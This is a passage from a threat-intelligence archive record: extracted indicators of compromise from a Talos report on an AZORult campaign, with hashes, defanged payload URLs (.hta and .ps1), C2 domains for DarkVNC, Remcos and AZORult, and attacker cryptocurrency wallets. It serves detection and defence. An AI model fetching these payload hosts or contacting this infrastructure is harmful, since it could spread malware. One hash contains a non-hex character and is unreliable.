loader\r\ncea286c1b346be680abbbabd35273a719d59d5ff8d09a6ef92ecf75689b356c4 - deobfuscated PowerShell Downloader\r\n35b95496b243541d5ad3667f4aabe2ed00066ba8b69b82f10dd1186872ce4be2 - cleanup script\r\nef9fc8a7be0075eb9372a2564273b6c1fffdb4b64f261b90fefea1d65f79b34e - part of XMRigCC support\r\n3dd5fbf31c8489ab02cf3c06a16bca7d4f3e6bbc7c8b30514b5c82b0b7970409 - Main PowerShell loader variant\r\nq5fdc4103c9c73f37b65ac3baa3cceae273899f4e319ded826178a9345f6f4a00 - Main PowerShell loader variant\r\nURLs hxxp://195[.]123[.]234[.]33/win/checking[.]hta\r\nhxxp://195[.]123[.]234[.]33/win/checking[.]ps1\r\nhxxp://195[.]123[.]234[.]33/win/del[.]ps1\r\nhxxp://195[.]123[.]234[.]33/win/update[.]hta\r\nhxxp://answerstedhctbek[.]onion\r\nhxxp://asq[.]r77vh0[.]pw/win/checking[.]hta\r\nhxxp://jthnx5wyvjvzsxtu[.]onion[.]pet\r\nhxxp://qlqd5zqefmkcr34a[.]onion[.]pet/win/checking[.]hta\r\nhxxps://answerstedhctbek[.]onion\r\nhxxps://answerstedhctbek[.]onion[.]pet\r\nhxxps://asq[.]d6shiiwz[.]pw/win/checking[.]ps1\r\nhxxps://asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta\r\nhxxps://asq[.]r77vh0[.]pw/win/checking[.]ps1\r\nhxxps://asq[.]r77vh0[.]pw/win/hssl/r7[.]hta\r\nhxxps://darkfailllnkf4vf[.]onion[.]pet\r\nhxxps://dreadditevelidot[.]onion[.]pet\r\nhxxps://fh[.]fhcwk4q[.]xyz/win/checking[.]ps1\r\nhxxps://fh[.]fhcwk4q[.]xyz/win/hssl/fh[.]hta\r\nhxxps://qlqd5zqefmkcr34a[.]onion[.]pet/win/checking[.]hta\r\nhxxps://runionv62ul3roit[.]onion[.]pet\r\nhxxps://rutorc6mqdinc4cz[.]onion[.]pet\r\nhxxps://thehub7xbw4dc5r2[.]onion[.]pet\r\nhxxps://torgatedga35slsu[.]onion\r\nhxxps://torgatedga35slsu[.]onion[.]pet\r\nhxxps://torrentzwealmisr[.]onion[.]pet\r\nhxxps://uj3wazyk5u4hnvtk[.]onion[.]pet\r\nhxxps://vkphotofqgmmu63j[.]onion[.]pet\r\nhxxps://xmh57jrzrnw6insl[.]onion[.]pet\r\nhxxps://zqktlwiuavvvqqt4ybvgvi7tyo4hjl5xgfuvpdf6otjiycgwqbym2qad[.]onion[.]pet\r\nhxxps://zzz[.]onion[.]pet\r\nhxxp://memedarka[.]xyz/ynvs2/index.php\r\nDomains dfgdgertdvdf[.]online - DarkVNC and Remcos C2\r\ndfgdgertdvdf[.]xyz - 
Remcos C2\r\nmemedarka[.]xyz - AZORult C2\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 13 of 14\n\nCryptocurrency wallets\r\n855vLkzTFwr82TrfPKLH6w3UB19RGdHDsGY1etmdyZjZChbhyghtiK66ZVXoVayJXVNydca7KZqE53Dn2Hsk8WdKDmjq3bu\r\n- Monero\r\nXrchZULVyJPAFro13627cyKdfb6ojerRwv - Dash\r\n3Csd9Zq4r16dVQuREs52y5eJFgYEqQjAx1 - Bitcoin\r\n0x51664e573049ab1ddbc2dc34f5b4fc290151cdb4 - Ethereum\r\nLS2GBEJEzgDy14hVHFp4JJzjKoiMgkbZAY - Litecoin\r\nD6yFAuCDoMkCftyXTWY8m267PzxeoaiMX7 - Doge-coin\r\nSource: https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nhttps://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html"
	],
	"report_names": [
		"azorult-brings-friends-to-party.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434567,
	"ts_updated_at": 1775791308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/97deaaf4ca4b69bd031f5f780a1f3c5ec7ace620.pdf",
		"text": "https://archive.orkl.eu/97deaaf4ca4b69bd031f5f780a1f3c5ec7ace620.txt",
		"img": "https://archive.orkl.eu/97deaaf4ca4b69bd031f5f780a1f3c5ec7ace620.jpg"
	}
}